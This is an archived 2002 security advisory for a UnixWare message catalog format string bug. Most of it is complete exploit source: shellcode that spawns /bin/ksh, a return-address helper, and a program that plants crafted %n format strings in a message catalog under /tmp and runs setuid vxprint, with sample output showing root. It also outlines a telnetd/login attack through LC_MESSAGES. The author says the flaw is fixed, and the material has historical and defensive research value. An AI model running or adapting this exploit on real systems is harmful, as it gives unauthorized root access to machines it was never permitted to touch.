Unixware Message catalog exploit code

2002-02-12T00:00:00
ID SECURITYVULNS:DOC:2479
Type securityvulns
Reporter Securityvulns
Modified 2002-02-12T00:00:00

Description

Hi, I'm jGgM.

I was reported this problem Caldera, a few week ago.

And, This exploit is fixed already.

Hacker can modify message catalog and,

It can possible format string exploit.

for example)

$ gcc -o expshell expshell.c

$ gcc -o getret getret.c

$ gcc -o fmt_exp fmt_exp.c

$ ./expshell

$ ./getret

e=8047af7

$ ./fmt_exp 0x8047af7 16 ( 16 is offset )

...........(wait 30 minutes ). ......

id

uid=0(root) gid=3(sys) ......................

This can exploit all of unixware 7 setuid/setgid

command.

Also, can exploit telnetd and login.

example)

$ telnet

telnet> env def LC_MESSAGES /tmp

telnet> o localhost

Trying....

.....

login: blah blah..

password: blah.. blash..

...... (wait 30 minutes.. )


Korean security forum

http://www.forsecure.com

http://www.netemperor.com


Here is code.

------------------ expshell.c ------------------

include <stdio.h>

char shellcode[]=

&quot;&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&quot;

&quot;&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&quot;

&quot;&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&quot;

&quot;&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&quot;

&quot;&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&quot;

&quot;&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&quot;

&quot;&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&quot;

&quot;&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&quot;

&quot;&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&quot;

&quot;&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&quot;

&quot;&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&quot;

&quot;&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&quot;

&quot;&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&quot;

&quot;&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&quot;

&quot;&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&quot;

&quot;&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&quot;

&quot;&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&quot;

&quot;&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&quot;

&quot;&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&quot;

&quot;&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&quot;

&quot;&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&quot;

&quot;&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&quot;

&quot;&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&quot;

&quot;&#92;xeb&#92;x1a&quot;             /* jmp     &lt;shellcode+28&gt;         */

&quot;&#92;x33&#92;xd2&quot;             /* xorl    &#37;edx,&#37;edx              */

&quot;&#92;x58&quot;                 /* popl    &#37;eax                   */

&quot;&#92;x8d&#92;x78&#92;x14&quot;         /* leal    0x14&#40;&#37;eax&#41;,&#37;edi        */

&quot;&#92;x57&quot;                 /* pushl   &#37;edi                   */

&quot;&#92;x50&quot;                 /* pushl   &#37;eax                   */

&quot;&#92;xab&quot;                 /* stosl   &#37;eax,&#37;es:&#40;&#37;edi&#41;        */

&quot;&#92;x92&quot;                 /* xchgl   &#37;eax,&#37;edx              */

&quot;&#92;xab&quot;                 /* stosl   &#37;eax,&#37;es:&#40;&#37;edi&#41;        */

&quot;&#92;x88&#92;x42&#92;x08&quot;         /* movb    &#37;al,0x8&#40;&#37;edx&#41;

*/

&quot;&#92;x83&#92;xef&#92;x3b&quot;         /* subl    $0x3b,&#37;edi             */

&quot;&#92;xb0&#92;x9a&quot;             /* movb    $0x9a,&#37;al              */

&quot;&#92;xab&quot;                 /* stosl   &#37;eax,&#37;es:&#40;&#37;edi&#41;        */

&quot;&#92;x47&quot;                 /* incl    &#37;edi                   */

&quot;&#92;xb0&#92;x07&quot;             /* movb    $0x07,&#37;al              */

&quot;&#92;xab&quot;                 /* stosl   &#37;eax,&#37;es:&#40;&#37;edi&#41;        */

&quot;&#92;xb0&#92;x0b&quot;             /* movb    $0x0b,&#37;al              */

&quot;&#92;xe8&#92;xe1&#92;xff&#92;xff&#92;xff&quot; /* call    &lt;shellcode+2&gt;          */

&quot;/bin/ksh&quot;

;

main(int argc, char *argv[])

{

char buff[1024];

sprintf(buff, "EGG=%s", shellcode);

putenv(buff);

putenv("LC_MESSAGES=/tmp");

system("/usr/bin/tcsh");

}


---------------- getret.c --------------------

main()

{

char *a;

a = getenv("EGG");

printf ("e=%p\n", a);

}


---------------- fmt_exp.c -----------------------------

include <stdio.h>

include "shellcode.h"

/ This is base of format string return address /

/ Base address of vxprint is 0x20c7c(134268) /

define BASE 134268

main(int argc, char *argv[])

{

FILE *fp;

char *retaddr;

long g_len, offset;

int count, count2, line=700, n=19;

if(argc < 2 || argc > 3) {

  printf&#40;&quot;Usage: &#37;s ret-address offset&#92;n&quot;, argv[0]&#41;;

  exit&#40;1&#41;;

}

retaddr = argv[1];

if(argc == 3) offset = atol(argv[2]);

else offset = 0;

g_len = strtol(retaddr, NULL, 16);

g_len -= BASE;

g_len += offset;

fp = fopen("testdef", "w+");

if(fp == NULL) {

  fprintf&#40;stderr, &quot;can not open file.&#92;n&quot;&#41;; exit&#40;1&#41;;

}

for(count=0; count<line; count++) {

  for&#40;count2=0; count2&lt;n; count2++&#41;

     fprintf&#40;fp, &quot;&#37;&#37;10x&quot;&#41;;

  fprintf&#40;fp, &quot;&#37;&#37;&#37;dx&#37;&#37;n&#92;n&quot;, g_len&#41;;

}

fclose(fp);

remove("testout");

system("mkmsgs testdef testout");

mkdir("/tmp/LC_MESSAGES", 0755);

system("mv

testout /tmp/LC_MESSAGES/vxvm.mesg");

printf("ret addr = 0x%x\n", g_len);

/ this, also can any set uid command /

execl("/usr/sbin/vxprint", "vxprint", "---", NULL);

}